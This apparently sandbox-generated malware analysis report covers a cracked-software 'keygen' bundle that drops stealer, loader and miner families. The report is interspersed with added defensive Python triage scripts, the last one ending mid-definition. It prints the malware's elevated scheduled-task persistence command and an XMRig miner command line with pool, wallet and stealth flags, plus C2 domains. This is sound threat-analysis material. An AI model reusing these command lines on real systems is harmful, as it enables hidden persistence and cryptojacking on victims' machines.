Analysis Overview
SHA256
4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
Threat Level: Known bad
The file 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Azorult
Detect Fabookie payload
FFDroider payload
SmokeLoader
OnlyLogger
Fabookie family
Ffdroider family
GCleaner
Onlylogger family
Azorult family
Gcleaner family
xmrig
Xmrig family
Fabookie
Smokeloader family
FFDroider
OnlyLogger payload
XMRig Miner payload
Deletes itself
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Program crash
System Location Discovery: System Language Discovery
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 13:01
Signatures
Azorult family
Privateloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
Files
memory/2140-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
150s
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/3252-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
57s
Max time network
125s
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Signatures
FFDroider
FFDroider payload
Ffdroider family
Reads user/profile data of web browsers
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | | tcp |
Files
memory/2068-0-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2068-1-0x0000000000020000-0x0000000000023000-memory.dmp
memory/2068-3-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2068-6-0x0000000000400000-0x0000000000667000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240729-en
Max time kernel
16s
Max time network
20s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
Files
memory/2212-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp
memory/2212-1-0x0000000001070000-0x000000000108E000-memory.dmp
memory/2212-2-0x0000000000350000-0x000000000036A000-memory.dmp
memory/2212-3-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
memory/2212-4-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
149s
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Xmrig family
xmrig
OnlyLogger payload
XMRig Miner payload
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4940 set thread context of 5048 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1208
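Added example (not part of the sandbox report): a Python triage pass over the process rows above. It reconstructs the scheduled-task persistence from the two schtasks command lines, pulls the pool, port, wallet and mode out of the XMRig-style arguments that explorer.exe is carrying, and ties that explorer.exe instance back to the SetThreadContext row from services64.exe, which is why a Windows shell binary is running with miner arguments. The process lines and the injection row are copied from this report into the script as constructed input; the user-writable path list and the set of system images are the example's own assumptions.

```python
import re

# Process rows copied from the behavioral8 report above, in the report's own
# layout: image path on one line, command line on the next. Constructed here
# for the example; nothing below touches a live system.
REPORT_PROCESSES = r'''
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
'''.strip().splitlines()

# The report's "Suspicious use of SetThreadContext" row, copied verbatim.
INJECTION_ROWS = [
    r"| PID 4940 set thread context of 5048 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |",
]

# Assumed lists for this example; tune them for your environment.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "dllhost.exe", "conhost.exe", "runtimebroker.exe"}
MINER_MARKERS = ("--algo=", "--url=", "--user=", "--randomx", "--cpu-max-threads-hint", "--cinit-")


def process_pairs(lines):
    """Pair the report's alternating image / command-line lines."""
    return list(zip(lines[0::2], lines[1::2]))


def parse_schtasks(cmdline):
    """Return the /sc, /rl, /tn and /tr values of a 'schtasks /create', or None."""
    if not re.search(r"schtasks\s+/create\b", cmdline, re.IGNORECASE):
        return None
    fields = {}
    for key in ("sc", "rl", "tn", "tr"):
        # the value is bare, "quoted", or '"double-wrapped"' as in the cmd.exe line above
        m = re.search(r"/" + key + r"\s+(?:'?\"([^\"]*)\"'?|(\S+))", cmdline, re.IGNORECASE)
        if m:
            fields[key] = m.group(1) if m.group(1) is not None else m.group(2)
    return fields


def is_logon_persistence(fields):
    """Elevated logon task whose action lives in a user-writable directory."""
    if not fields:
        return False
    action = fields.get("tr", "").lower()
    return (fields.get("sc", "").lower() == "onlogon"
            and fields.get("rl", "").lower() == "highest"
            and any(p in action for p in USER_WRITABLE))


def parse_miner_args(cmdline):
    """Pull pool, wallet and mode out of XMRig-style arguments; None if too few markers."""
    hits = sum(1 for marker in MINER_MARKERS if marker in cmdline)
    if hits < 3:
        return None
    info = {"markers": hits, "pool": None, "port": None, "wallet": None, "algo": None}
    m = re.search(r"--url=([^\s:]+):(\d+)", cmdline)
    if m:
        info["pool"], info["port"] = m.group(1), int(m.group(2))
    m = re.search(r"--user=([^\s.]+)", cmdline)   # the wallet precedes the ".worker" suffix
    if m:
        info["wallet"] = m.group(1)
    m = re.search(r"--algo=(\S+)", cmdline)
    if m:
        info["algo"] = m.group(1)
    argv = cmdline.split()
    info["tls"] = "--tls" in argv
    info["stealth"] = "--cinit-stealth" in argv
    return info


def parse_injection_row(row):
    """'| PID A set thread context of B | N/A | src | dst |' -> dict, else None."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    m = re.match(r"PID (\d+) set thread context of (\d+)", cells[0])
    if not m:
        return None
    return {"src_pid": int(m.group(1)), "dst_pid": int(m.group(2)),
            "src": cells[2], "dst": cells[3]}


def triage(lines, injection_rows):
    """Emit findings for logon persistence, miner arguments and hollowed system processes."""
    injections = [r for r in map(parse_injection_row, injection_rows) if r]
    findings = []
    for image, cmdline in process_pairs(lines):
        base = image.rsplit("\\", 1)[-1].lower()
        task = parse_schtasks(cmdline)
        if is_logon_persistence(task):
            findings.append({"kind": "persistence", "image": image,
                             "task": task["tn"], "action": task["tr"]})
        miner = parse_miner_args(cmdline)
        if miner:
            finding = {"kind": "miner", "image": image, **miner}
            if base in SYSTEM_IMAGES:
                # a Windows binary does not take pool arguments: the code running in
                # this process is not explorer.exe's own; name the injecting process
                finding["injected_by"] = next(
                    (i["src"] for i in injections if i["dst"].lower() == image.lower()), None)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage(REPORT_PROCESSES, INJECTION_ROWS):
        print(finding)
```

The wallet is the `--user=` value up to the first dot; the `.office/password` suffix is the worker name the miner reports to the pool, so the wallet alone is the indicator to pivot on. Run stand-alone the script prints the two persistence findings (the cmd.exe wrapper and the schtasks.exe child both carry the same command) and the explorer.exe miner finding with `injected_by` set to services64.exe.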
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.149.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 163.172.171.111:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 163.172.154.142:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 142.154.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
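Added example (not the report's own tooling): pulling indicators out of a Network table in the layout used above. Rows to the sandbox resolver (8.8.8.8:53) are treated as DNS queries, `.in-addr.arpa` names as the sandbox's own reverse lookups of the peers it saw, and a small allowlist (crl.microsoft.com, c.pki.goog) as OS background traffic; what remains is deduplicated, counted, and tagged where the report itself classifies the host (the shared-hosting services it flags, and the ip-api.com lookup). The rows are a constructed subset copied from this table, plus the two crl.microsoft.com rows from the behavioral17 table to exercise the allowlist; the allowlist and the tag sets are the example's assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed input: a subset of the behavioral8 Network table above, plus the
# two crl.microsoft.com rows from the behavioral17 table. Direct-to-IP
# connections have an empty Domain cell.
NETWORK_ROWS = """
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| FR | 163.172.171.111:14433 | xmr-eu2.nanopool.org | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| FR | 163.172.154.142:14433 | xmr-eu1.nanopool.org | tcp |
| UA | 194.145.227.161:80 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
""".strip().splitlines()

RESOLVER = "8.8.8.8:53"                               # the sandbox's DNS forwarder, not an indicator
BENIGN = {"crl.microsoft.com", "c.pki.goog"}          # OS / PKI background traffic (assumed list)
SHARED_HOSTING = {"raw.githubusercontent.com", "github.com", "pastebin.com", "iplogger.org"}
IP_LOOKUP = {"ip-api.com"}
ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def parse_row(row):
    """Split a '| Country | Destination | Domain | Proto |' row into a dict, or None.

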